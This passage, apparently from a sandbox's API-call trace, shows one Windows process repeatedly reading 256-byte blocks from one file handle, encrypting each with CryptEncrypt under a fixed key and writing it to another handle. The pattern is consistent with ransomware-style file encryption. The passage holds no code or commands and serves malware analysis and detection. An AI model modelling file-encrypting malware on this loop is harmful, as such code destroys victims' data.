lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.063] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.064] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.064] GetLastError () returned 0x0 [0168.064] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.064] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.064] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.064] GetLastError () returned 0x0 [0168.064] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.064] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.064] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.064] GetLastError () returned 0x0 [0168.064] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.064] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.064] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.064] GetLastError () returned 0x0 [0168.064] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.064] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.064] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.064] GetLastError () returned 0x0 [0168.064] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.065] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.065] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.065] GetLastError () returned 0x0 [0168.065] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.065] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.065] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.065] GetLastError () returned 0x0 [0168.065] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.065] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.065] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.065] GetLastError () returned 0x0 [0168.065] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.065] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.065] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.065] GetLastError () returned 0x0 [0168.065] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.065] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.065] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.065] GetLastError () returned 0x0 [0168.065] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.066] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.066] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.066] GetLastError () returned 0x0 [0168.066] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.066] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.066] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.066] GetLastError () returned 0x0 [0168.066] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.066] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.066] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.066] GetLastError () returned 0x0 [0168.066] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.066] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.066] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.066] GetLastError () returned 0x0 [0168.066] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.066] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.066] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.067] GetLastError () returned 0x0 [0168.067] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.067] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.067] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.067] GetLastError () returned 0x0 [0168.067] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.067] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.067] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.067] GetLastError () returned 0x0 [0168.067] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.067] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.067] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.067] GetLastError () returned 0x0 [0168.067] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.067] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.067] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.067] GetLastError () returned 0x0 [0168.067] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.067] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.068] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.068] GetLastError () returned 0x0 [0168.068] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.068] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.068] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.068] GetLastError () returned 0x0 [0168.068] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.068] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.068] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.068] GetLastError () returned 0x0 [0168.068] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.068] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.068] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.068] GetLastError () returned 0x0 [0168.068] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.068] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.068] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.068] GetLastError () returned 0x0 [0168.069] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.069] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.069] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.069] GetLastError () returned 0x0 [0168.069] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.069] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.069] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.069] GetLastError () returned 0x0 [0168.069] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.069] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.069] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.071] GetLastError () returned 0x0 [0168.071] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.071] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.071] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.071] GetLastError () returned 0x0 [0168.071] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.071] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.071] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.071] GetLastError () returned 0x0 [0168.071] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.071] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.071] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.071] GetLastError () returned 0x0 [0168.071] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.071] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.072] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.072] GetLastError () returned 0x0 [0168.072] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.072] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.072] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.072] GetLastError () returned 0x0 [0168.072] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.072] ReadFile (in: hFile=0x15b0, 